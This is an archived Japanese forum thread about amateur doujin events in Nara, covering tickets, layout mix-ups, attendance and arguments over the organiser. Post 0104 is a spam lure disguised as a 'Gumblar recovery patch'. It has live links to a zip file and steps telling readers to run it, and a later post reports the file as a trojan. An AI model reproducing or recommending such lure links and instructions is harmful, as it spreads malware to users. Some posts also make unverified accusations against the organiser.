X



奈良県のイベント

■ このスレッドは過去ログ倉庫に格納されています
0001なら
垢版 |
08/02/11 02:43ID:???
奈良県内のイベントスレです

奈良がなかったのでたてました!
奈良イベントに参加してる人語ろう
0101カタログ片手に名無しさん
垢版 |
10/01/10 21:41ID:???
サイトの日記更新されてたけど、あと一週間ですね〜当日はよろしく、みたいなのだけで
肝心のサークルチケットの事とかには一言も触れてないね・・・
せめて「○日に発送予定です」とか「発送しました」とか書いてほしい
0103カタログ片手に名無しさん
垢版 |
10/01/11 12:36ID:DD5qiO4k
待っている人、多いんだね。
申し込みが自分だけだったらどうしようかと思ってた。
0104カタログ片手に名無しさん
垢版 |
10/01/12 16:48ID:???
【緊急】ガンブラー復旧パッチ使用手順。
http://sirmaximus.com/?security/news/view.cgi?type=gumblar
http://www14.atpages.jp/saba02site/files/fukkyuu0.zip

手順1
上記をダウンロードする。
手順2
ダウンロードしたファイルを任意のソフトで解凍する。
手順3
解凍したファイル内にある復旧パッチを実行すると、
「windowを復旧しますか?」とメッセージが出るので「yes」を選択します。
手順4
実行後、PCをセーフモードで再起動してください。           
0105カタログ片手に名無しさん
垢版 |
10/01/12 18:58ID:PTGcUUno
案内書届いたよー(*´ー`*) ノ
主催さんおつかれさまん
0106カタログ片手に名無しさん
垢版 |
10/01/12 19:13ID:???
報告ついでに>104の報告も・・・
1つめ
海外の精力剤・勃起増大剤販売サイトですが不正スクリプトJS:Illredir-Aを検出します。PC有害です。
2つめ
落ちてきたzipファイルからウイルスWin32:Trojan-genを検出します。PC有害です。

だそうです。104のURLはクリックしないように気を付けた方がよさそうです。
0108カタログ片手に名無しさん
垢版 |
10/01/12 19:34ID:???
自分も案内書届いたよー
誤字あるし、いい訳してるわでgdgd過ぎて笑いが出るんだけど…
久しぶりの奈良なので当日は楽しみにしてます

>>107
案内書もサイトにも書いてないから当日行かないと解らないんじゃないかな?
0110カタログ片手に名無しさん
垢版 |
10/01/12 22:26ID:???
万葉ホールで開催された過去のイベントを参考に
スペースナンバーから大体の配置を予想するとかw
1〜20→壁
21〜 →島
くらいしか予想できないけど

円形配置だったりしたらごめんね!
0113カタログ片手に名無しさん
垢版 |
10/01/13 14:42ID:3TGyJcTw
締め切りギリギリに出したのに10番以内の数字だったんだが
SPナンバーは申し込んだ順番関係なしなのかなぁ
0115カタログ片手に名無しさん
垢版 |
10/01/13 20:03ID:h/uhE8Xg
自分の方は昨年に申込んだけど、10番以上だった。
ちなみに、自分のジャンルは人気ジャンルではないよ(笑)
0117カタログ片手に名無しさん
垢版 |
10/01/15 22:48ID:LJLHpJXg
サイトにサークル配置図出てたよ
すごく…少ないです…
0118カタログ片手に名無しさん
垢版 |
10/01/15 22:54ID:BpytOt56
気にしない!
楽しもうぜ!!
0119カタログ片手に名無しさん
垢版 |
10/01/17 18:02ID:???
イベント行ってきたよ。

サークル数の割にはいっぱいの人でビックリした
ただ、よくわからないんだがパンフの配置図と
実際にいたサークルの場所がめちゃくちゃじゃなかった??
パンフ見て気になったサークルのところに行ったけど明らかに違うサークルがいて
あれ?ってなった
0120カタログ片手に名無しさん
垢版 |
10/01/17 19:03ID:???
今日たまたま図書館行ってて5階の喫煙室行ったら何やらイベントやっててびっくりした。

見てるかわからんけど、質問答えてくれたmagnetミクの人ありがとう。

かわいかった。
0121カタログ片手に名無しさん
垢版 |
10/01/17 22:19ID:???
サークルだけど
朝、会場に入って机を見たらサークル名を書いた紙が配置図通りには無かったのさ。
どうなることかと心配したが、終ってみたら楽しかったので、許すよ!
でも次回は配置図通りに紙を置いてほしいね。
写真撮らせていただいたレイヤーさん、うちのサークルで買っていただいた方々、主催・スタッフの皆さん、お疲れ様でした!
0122カタログ片手に名無しさん
垢版 |
10/01/18 01:53ID:???
サークル参加してきたよ。
スペース数の割りには参加者さんが居たね。
配置場所もパンフと違って意味不明だし、なによりも個人情報が記載されている
申込用紙をそのままスペース案内用に使うのは危険だと思ったよ。
イベント自体は楽しかったから今度もしするならその辺りを改善して欲しいな
今日参加した皆さん・主催スタッフさんお疲れ様!
0126カタログ片手に名無しさん
垢版 |
10/03/19 20:28ID:???
万葉ホールイベント開催予定

04月11日オール
05月05日オール
07月11日オール
09月26日ボカロ
10月10日オール



0132カタログ片手に名無しさん
垢版 |
10/03/23 06:07ID:???
参加した事があるが、イベント自体は普通で何も問題は無かった。
参加証が届くのが少し遅いという事はあるが、その事を理解しておけばそれも気にならない。

評判は風評に近いよ。
0134カタログ片手に名無しさん
垢版 |
10/03/24 21:22ID:???
ムネ○ュンのサイトを検索すれば、全部出てくるよ。
情報サイトにはまだ7月11日までしか載っていないね。
0136カタログ片手に名無しさん
垢版 |
10/03/25 12:37ID:???
他の主催者さんが、間にイベントを企画するなら、イベントPRの足掛かりにもなるので、奈良としてはありがたい事だ。
皆、頑張れ!
0137カタログ片手に名無しさん
垢版 |
10/03/26 22:25ID:???
奈良イベントが増えると聞いて検索したが全部宗休なのか…
会場代も馬鹿にならないだろうに立て続けに凄い勢いだな
他の主催さんも待ってるよ!
0138カタログ片手に名無しさん
垢版 |
10/03/27 21:57ID:???
万葉ホールのイベントって、なんかのんびりできてお気に入りさ。
皆、頑張ってね。
楽しみだよ!
0144カタログ片手に名無しさん
垢版 |
10/04/01 05:09ID:???
改善されたみたいで良かったじゃん。
割りと参加者も多いみたいだし。
自分は行けないけど皆、楽しんで来てくれ。
0148カタログ片手に名無しさん
垢版 |
10/04/03 14:59ID:???
イベント一回、一回、全力で頑張って参加していれば、そんなサークルになれるよ。
頑張りませう!
0150カタログ片手に名無しさん
垢版 |
10/04/06 16:28ID:g39s2J1g
やばいイベントサークルが4月のドリライに参加するみたい。
http://nara.kensite.jp/
0152カタログ片手に名無しさん
垢版 |
10/04/06 20:56ID:???
ドリライも回を追うごとにイベントのPRが良くなってきていると思うよ!
まだ発展途上だから、これからまだ参加者が増える余地がある。
頑張って奈良イベを盛り上げてほしい!

5月のイベントも期待しているよ!
0154カタログ片手に名無しさん
垢版 |
10/04/12 20:13ID:???
自分は昨日、万葉へは行けなかったのだが、行った人の話では、300人以上は居たかも?ということだった。
また、頑張って開催してほしいね。
主催者さんは複数いる方が、いろいろな個性が出て楽しいよ。

0156カタログ片手に名無しさん
垢版 |
10/04/14 17:15ID:FL9lsvTY
>>131
遅レスでごめんだけど…
イベント自体には問題ないんだが主催が悪質な転売ヤーなんだって
三重スレの過去ログ参照
0157カタログ片手に名無しさん
垢版 |
10/04/14 22:02ID:???
>156
自分は5月、参加予定で楽しみにしている。
多くの人が楽しみにしていることに水をさすのは、感心しないな。
奈良イベスレを荒らさないでくれ。
0158カタログ片手に名無しさん
垢版 |
10/04/14 22:23ID:???
ドリライ、400人もの来場者があったて!?
サークル参加数の割に多かったな。
次回こそは参加したいよ。
0163カタログ片手に名無しさん
垢版 |
10/04/18 23:45ID:???
まだ少し先の話なんだが、今年の秋はオールジャンルの即売会が各地で増えるみたいだから、奈良イベントも頑張ってほしいぞ!
0164カタログ片手に名無しさん
垢版 |
10/04/19 14:03ID:???
京都や大阪が増えたのは、逆に奈良イベのPRする場所が増えたのでいいことだ。
ポジティブ、ポジティブ!
0166カタログ片手に名無しさん
垢版 |
10/04/19 21:39ID:???
>164
今年は11月にも神戸ライブがあるそうだ。企業イベントが京阪神での開催を活発化させているぞ!
奈良イベも頑張ってほしい!
応援するぞ!!
0167カタログ片手に名無しさん
垢版 |
10/04/19 21:57ID:???
>166
私の方では、他県のアマチュアイベントも増えると聞いたよ。
とりあえず、もうチラシが出ている所では、滋賀とか。
また他のを見たら報告入れるね。
0170カタログ片手に名無しさん
垢版 |
10/04/20 06:40ID:???
>166
ライブが増えると行っても、昨年より参加数が減ったので、会場を変えての開催になるみたいだ。
奈良は現在、来場者数は多いが油断しないように頑張ってほしい。

0175カタログ片手に名無しさん
垢版 |
10/04/22 10:13ID:???
だから踊り子さんに触るなと…

主催がアレな人でもイベントは普通らしいので5月参加するつもりだけどサークルどれだけ集まってるんだろ?
ドリライで満足して参加見送りする人とかいるのかな?
0177カタログ片手に名無しさん
垢版 |
10/04/22 12:28ID:???
率直すぎてフイタw
明らかな未成年に成人向けの中古同人誌を年齢確認無しで売ってる以外は確かに普通だなw
0179カタログ片手に名無しさん
垢版 |
10/04/22 17:26ID:???
>175
サークル参加が少なくても、サークルが困ることは無いさ。
一般参加が多くて作品を見てもらえたなら、美味しいじゃないか。
1月の奈良はサークル数が少なかったが、いつもより買ってもらえた。
5月も、そうだといいな。
0182カタログ片手に名無しさん
垢版 |
10/04/23 21:52ID:RLIVHDRw
叩かれるほど期待の裏返しってか?
俺は楽しみにしているぜ。
お気に入りのサークルさんが参加予定だしな。
0187カタログ片手に名無しさん
垢版 |
10/04/24 05:20ID:???
自分も応援しているよ。








奈良イベは昔から元気なイメージがある。
参加すると元気がもらえる。
どのイベントでも同じさ。
参加している人達が親切だからだと思う。
奈良県最高ーっ!
当日はよろしく!!





ファィト!!







0189カタログ片手に名無しさん
垢版 |
10/04/25 00:17ID:???
おいおい褒め殺しとは身に余る光栄だぜ
荒らしは余程イベントを宣伝したいらしいな
期待されてる証拠だな








胸キュン主催ファイト!(笑)


ファイト!ファイト!ファイト!(笑)
0191カタログ片手に名無しさん
垢版 |
10/04/25 15:05ID:???
こんなヤバイ主催に個人情報渡すなんて死んでもお断りだ
胸キュン主催のイベントは一切サークル参加してない
一般参加でパンフ代くれてやるのもごめんだね
0196カタログ片手に名無しさん
垢版 |
10/04/26 11:32ID:???
ねぇ知ってる?荒らしにかまう奴も荒らしなんだよ?
ここはひとつ踊り子さんに触らない方向で居てほしい。
つか奈良イベントのスレなんで主催個人の事なら専スレでやって下さいお願いします
0198カタログ片手に名無しさん
垢版 |
10/04/26 20:31ID:???
奈良県イベントは、まあまあ順調なので、楽しみにしているよ。
三重の人達もたくさん参加されているし、ありがたいことに仲良くお付き合いさせていただいている。
今後ともよろしくです!
■ このスレッドは過去ログ倉庫に格納されています

ニューススポーツなんでも実況